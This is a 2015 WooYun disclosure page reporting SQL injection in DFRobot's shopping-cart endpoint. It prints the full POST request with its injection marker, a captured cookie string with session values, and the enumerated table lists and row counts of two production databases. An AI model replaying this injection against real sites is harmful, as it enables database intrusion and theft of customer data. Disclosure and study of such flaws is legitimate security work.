当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159383

漏洞标题:DFRobot创客社区WWW主站存在SQL注入漏洞

相关厂商:dfrobot.com.cn

漏洞作者: 深度安全实验室

提交时间:2015-12-08 16:35

修复时间:2015-12-13 16:36

公开时间:2015-12-13 16:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /flow.php?step=add_to_cart HTTP/1.1
Content-Length: 251
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.dfrobot.com.cn
Cookie: jteU_2132_saltkey=Ex2L22YY; jteU_2132_lastvisit=1449525559; jteU_2132_sid=tFbxPF; jteU_2132_lastact=1449534410%09member.php%09logging; real_ipd=124.114.79.150; ECS_ID=0730117d7c02421ff20433ad303c8f2af291b35d; ECS[visit_times]=1; jteU_2132_st_p=0%7C1449529116%7C3cb5bbce4164d0866662a404ee5125cf; jteU_2132_visitedfid=92D100; jteU_2132_viewid=tid_12771; jteU_2132_st_t=0%7C1449529118%7C55bfa02338372c10bf2c32612ec7e27a; jteU_2132_forum_lastvisit=D_100_1449529116D_92_1449529118; jteU_2132_home_diymode=1; jteU_2132_home_readfeed=1449529108; jteU_2132_con_request_token=16129543614185153029; jteU_2132_con_request_token_secret=jfeFgifTC2xxg85G; jteU_2132_sendmail=1; ECS[display]=grid; ECS[history]=1207%2C980%2C1178%2C1202%2C1070; jteU_2132__refer=%252Fcommunity%252Fhome.php%253Fac%253Dfeed%2526feedid%253D355%2526mod%253Dspacecp; jteU_2132_connect_not_sync_feed=1; jteU_2132_connect_not_sync_t=1; jteU_2132_onlineusernum=29; onlineipd=124.114.79.150; pgv_pvi=4888092800; pgv_info=ssi=s7710268100; jteU_2132_saltkey=Ex2L22YY; jteU_2132_lastvisit=1449525559; jteU_2132_sid=i153TH; jteU_2132_lastact=1449529159%09home.php%09misc; jteU_2132_sendmail=1; pgv_pvi=4888092800; pgv_info=ssi=s7710268100; _ga=GA1.3.231402864.1449529165; _gat=1; ftwwwdfrobotcomcn=1; jteU_2132_atarget=1; user_id=0; v="2015120807071400034612700162383880|::"; opxPID=2015120807071400034612700162383880; u=1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|; JSESSIONID=99697C8A87FA0E827DE913F8CB98A574; bdshare_firstime=1449532644549; BAIDUID=6FBC214DA55BD5FED3308299A9D92969:FG=1
Host: www.dfrobot.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goods=%7b%22goods_id%22:554%2c%22number%22:2%2c%22parent%22:%22*%22%2c%22quick%22:1%2c%22spec%22:%5b%5d%7d

漏洞证明:

1.png

Database: dfrobotcomcnv2
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| ecs_stats | 912749 |
| ecs_member_price | 324664 |
| ecs_keywords | 271441 |
| ecs_order_action | 33150 |
| ecs_order_goods | 23566 |
| ecs_delivery_goods | 21433 |
| ecs_admin_log | 14031 |
| ecs_sessions_data | 13686 |
| ecs_pay_log | 10414 |
| ecs_order_info | 9965 |
| ecs_account_log | 9823 |
| ecs_delivery_order | 8993 |
| ecs_users | 8328 |
| ecs_user_address | 4668 |
| ecs_link_goods | 4551 |
| ecs_goods_gallery | 3585 |
| ecs_region | 3408 |
| ecs_user_bonus | 3292 |
| ecs_goods_cat | 2942 |
| ecs_searchengine | 2835 |
| ecs_search_words | 2629 |
| wxch_message | 2243 |
| ecs_cart | 2121 |
| ecs_collect_goods | 1894 |
| ecs_wishlist | 1668 |
| ecs_goods | 1073 |
| ecs_adsense | 1040 |
| ecs_email_sendlist | 894 |
| discount | 842 |
| ecs_feedback | 792 |
| wxch_user | 445 |
| ecs_wishlist_info | 322 |
| ecs_zxcomment | 288 |
| ecs_area_region | 203 |
| ecs_group_goods | 201 |
| ecs_shop_config | 180 |
| ecs_touch_shop_config | 180 |
| ecs_booking_goods | 155 |
| ecs_sessions | 155 |
| ecs_admin_action | 110 |
| ecs_category | 99 |
| ecs_tag | 69 |
| ecs_ad_position | 65 |
| ecs_bonus_type | 56 |
| wxch_point_record | 56 |
| ecs_template | 38 |
| ecs_article | 37 |
| ecs_cat_recommend | 31 |
| ecs_free_shipping | 29 |
| ecs_nav | 28 |
| ecs_user_account | 27 |
| ecs_comment | 24 |
| wxch_prize_append | 24 |
| ecs_brand | 23 |
| ecs_ad | 18 |
| wxch_menu | 18 |
| ecs_admin_user | 15 |
| ecs_shipping_area | 15 |
| ecs_touch_shipping_area | 15 |
| ecs_mail_templates | 14 |
| wxch_lang | 12 |
| wxch_msg | 12 |
| ecs_favourable_activity | 11 |
| ecs_goods_article | 10 |
| wxch_cfg | 10 |
| wxch_keywords_article | 10 |
| ecs_article_cat | 9 |
| ecs_user_rank | 9 |
| ecs_volume_price | 9 |
| wxch_point | 9 |
| ecs_touch_nav | 8 |
| ecs_payment | 7 |
| ecs_reg_fields | 6 |
| ecs_back_goods | 5 |
| ecs_goods_attr | 5 |
| ecs_shipping | 5 |
| ecs_touch_payment | 5 |
| ecs_touch_shipping | 5 |
| ecs_vote_option | 4 |
| wxch_prize_cnum | 4 |
| ecs_goods_activity | 3 |
| wxch_order | 3 |
| wxch_prize | 3 |
| ecs_attribute | 2 |
| ecs_exchange_goods | 2 |
| ecs_goods_type | 2 |
| ecs_topic | 2 |
| ecs_auto_manage | 1 |
| ecs_back_order | 1 |
| ecs_crons | 1 |
| ecs_touch_ad | 1 |
| ecs_touch_ad_position | 1 |
| ecs_vote | 1 |
| ecs_vote_log | 1 |
| wxch_config | 1 |
| wxch_coupon | 1 |
| wxch_keywords | 1 |
| wxch_oauth | 1 |
| wxch_pay | 1 |
| wxch_prize_count | 1 |
| wxch_ver | 1 |
+-------------------------+---------+


Database: df_discuz
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_forum_post | 45222 |
| pre_common_district | 45051 |
| pre_forum_filter_post | 30372 |
| pre_forum_statlog | 26345 |
| pre_forum_threadpartake | 23710 |
| pre_ucenter_feeds | 23385 |
| pre_home_notification | 19809 |
| pre_forum_attachment | 18186 |
| pre_common_credit_rule_log | 17631 |
| pre_ucenter_memberfields | 13626 |
| pre_ucenter_members | 13529 |
| pre_forum_thread | 12640 |
| pre_common_member_count | 8602 |
| pre_common_member_field_forum | 8602 |
| pre_common_member_field_home | 8602 |
| pre_common_member_profile | 8602 |
| pre_common_member_status | 8602 |
| pre_common_member | 8600 |
| pre_common_onlinetime | 5557 |
| pre_common_tagitem | 4748 |
| pre_common_member_newprompt | 4071 |
| pre_dsu_paulsign | 3620 |
| pre_forum_memberrecommend | 3196 |
| pre_common_block_pic | 3030 |
| pre_mobile_wsq_threadlist | 2674 |
| pre_connect_memberbindlog | 2523 |
| pre_common_block_item | 2445 |
| pre_forum_threadimage | 2436 |
| pre_common_member_connect | 2395 |
| pre_home_pic | 2332 |
| pre_common_tag | 2064 |
| pre_forum_attachment_8 | 2054 |
| pre_forum_attachment_0 | 1974 |
| pre_forum_attachment_1 | 1895 |
| pre_forum_attachment_7 | 1887 |
| pre_forum_attachment_5 | 1833 |
| pre_forum_modwork | 1812 |
| pre_connect_postfeedlog | 1783 |
| pre_forum_attachment_6 | 1701 |
| pre_ucenter_mergemembers | 1678 |
| pre_forum_attachment_3 | 1676 |
| pre_forum_threadaddviews | 1669 |
| pre_forum_sofa | 1622 |
| pre_forum_attachment_2 | 1612 |
| pre_forum_attachment_9 | 1611 |
| pre_common_connect_guest | 1583 |
| pre_ucenter_pm_indexes | 1501 |
| pre_forum_attachment_4 | 1472 |
| pre_forum_threadmod | 1388 |
| pre_common_mytask | 1260 |
| pre_common_stat | 1255 |
| pre_common_credit_log | 1150 |
| pre_common_credit_log_field | 1146 |
| pre_forum_threadpreview | 930 |
| pre_ucenter_pm_members | 922 |
| pre_home_follow_feed_archiver | 886 |
| pre_home_favorite | 863 |
| pre_forum_post_tableid | 836 |
| pre_forum_threadhot | 822 |
| pre_forum_threadcalendar | 649 |
| pre_forum_hotreply_member | 586 |
| pre_ucenter_pm_lists | 469 |
| pre_plugin_lj_sina | 462 |
| pre_common_setting | 457 |
| pre_forum_rsscache | 455 |
| pre_common_stylevar | 452 |
| pre_common_block | 416 |
| pre_forum_attachment_unused | 415 |
| pre_connect_feedlog | 411 |
| pre_home_follow | 401 |
| pre_home_friend | 394 |
| pre_forum_hotreply_number | 328 |
| pre_forum_pollvoter | 285 |
| pre_home_doing | 283 |
| pre_forum_postcomment | 254 |
| pre_common_smiley | 200 |
| pre_common_magiclog | 195 |
| pre_connect_tthreadlog | 194 |
| pre_common_template_block | 182 |
| pre_common_syscache | 173 |
| pre_home_friendlog | 173 |
| pre_ucenter_pm_messages_0 | 172 |
| pre_ucenter_pm_messages_6 | 166 |
| pre_forum_medallog | 165 |
| pre_ucenter_pm_messages_2 | 162 |
| pre_common_searchindex | 161 |
| pre_home_blog | 159 |
| pre_home_blogfield | 159 |
| pre_ucenter_pm_messages_9 | 157 |
| pre_common_member_action_log | 156 |
| pre_ucenter_newpm | 155 |
| pre_common_member_medal | 154 |
| pre_ucenter_pm_messages_1 | 154 |
| pre_ucenter_pm_messages_3 | 152 |
| pre_forum_postcache | 151 |
| pre_home_comment | 151 |
| pre_common_member_crime | 140 |
| pre_ucenter_pm_messages_7 | 140 |
| pre_ucenter_pm_messages_4 | 139 |
| pre_forum_spacecache | 136 |
| pre_ucenter_pm_messages_8 | 134 |
| pre_common_credit_rule_log_field | 129 |
| pre_ucenter_pm_messages_5 | 125 |
| pre_security_evilpost | 123 |
| pre_common_statuser | 114 |
| pre_common_block_style | 109 |
| pre_forum_poststick | 109 |
| pre_forum_threadclass | 99 |
| pre_common_pluginvar | 95 |
| pre_home_share | 93 |
| pre_home_album | 87 |
| pre_forum_newthread | 73 |
| pre_dfrobot_tutorial | 70 |
| pre_forum_polloption | 69 |
| pre_common_admincp_perm | 68 |
| pre_hardware_tokens | 68 |
| pre_forum_forumfield | 66 |
| pre_forum_forum | 65 |
| pre_common_nav | 61 |
| pre_common_session | 57 |
| pre_common_member_profile_setting | 51 |
| pre_home_friend_request | 50 |
| pre_home_feed | 47 |
| pre_forum_threaddisablepos | 46 |
| pre_hardware_info | 42 |
| pre_home_pokearchive | 37 |
| pre_common_optimizer | 36 |
| pre_common_credit_rule | 33 |
| pre_forum_debatepost | 33 |
| pre_ucenter_settings | 29 |
| pre_security_eviluser | 28 |
| pre_common_usergroup | 27 |
| pre_common_usergroup_field | 27 |
| pre_home_picfield | 27 |
| pre_common_cache | 26 |
| pre_common_diy_data | 26 |
| pre_common_magic | 24 |
| pre_hardware_query | 24 |
| pre_common_word | 23 |
| pre_common_myapp | 21 |
| pre_common_plugin | 21 |
| pre_forum_replycredit | 21 |
| pre_common_cron | 20 |
| pre_forum_attachtype | 20 |
| pre_comeing_touch | 19 |
| pre_forum_activityapply | 19 |
| pre_forum_forumrecommend | 19 |
| pre_forum_moderator | 18 |
| pre_common_member_secwhite | 17 |
| pre_forum_medal | 17 |
| pre_forum_poll | 17 |
| pre_common_member_magic | 16 |
| pre_common_seccheck | 16 |
| pre_home_click | 15 |
| pre_common_report | 14 |
| pre_common_failedip | 11 |
| pre_forum_onlinelist | 10 |
| pre_dsu_paulsignemot | 9 |
| pre_forum_promotion | 9 |
| pre_home_poke | 9 |
| pre_home_show | 9 |
| pre_common_admingroup | 8 |
| pre_common_style | 8 |
| pre_common_template | 8 |
| pre_ucenter_notelist | 8 |
| pre_common_friendlink | 7 |
| pre_forum_collection | 7 |
| pre_forum_collectionthread | 7 |
| pre_ucenter_vars | 7 |
| pre_common_task | 6 |
| pre_common_taskvar | 6 |
| pre_forum_typeoption | 6 |
| pre_home_docomment | 6 |
| pre_common_admincp_group | 5 |
| pre_common_admincp_member | 5 |
| pre_common_block_item_data | 5 |
| pre_forum_imagetype | 5 |
| pre_forum_threadclosed | 5 |
| pre_home_class | 5 |
| pre_common_block_favorite | 4 |
| pre_forum_bbcode | 4 |
| pre_portal_article_content | 4 |
| pre_portal_article_count | 4 |
| pre_portal_category | 4 |
| pre_common_admincp_cmenu | 3 |
| pre_forum_activity | 3 |
| pre_forum_collectionrelated | 3 |
| pre_forum_grouplevel | 3 |
| pre_home_clickuser | 3 |
| pre_home_follow_feed | 3 |
| pre_portal_topic | 3 |
| pre_common_failedlogin | 2 |
| pre_common_member_log | 2 |
| pre_common_patch | 2 |
| pre_common_process | 2 |
| pre_common_secquestion | 2 |
| pre_common_word_type | 2 |
| pre_forum_access | 2 |
| pre_forum_warning | 2 |
| pre_mobile_setting | 2 |
| pre_portal_article_title | 2 |
| pre_portal_article_trash | 2 |
| pre_portal_rsscache | 2 |
| pre_ucenter_applications | 2 |
| pre_common_admincp_session | 1 |
| pre_common_advertisement | 1 |
| pre_common_member_wechatmp | 1 |
| pre_dsu_paulsignset | 1 |
| pre_forum_collectioncomment | 1 |
| pre_forum_debate | 1 |
| pre_forum_threadprofile | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_failedlogins | 1 |
| pre_ucenter_friends | 1 |
+-----------------------------------+---------+

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-13 16:36

厂商回复:

漏洞Rank:20 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-08 20:25 | VMApire ( 路人 | Rank:6 漏洞数:1 | ★财神网络★欢迎各位大牛加入)

    高价招聘:各种技术大牛【欢迎各位大牛来咨询】kkjk.net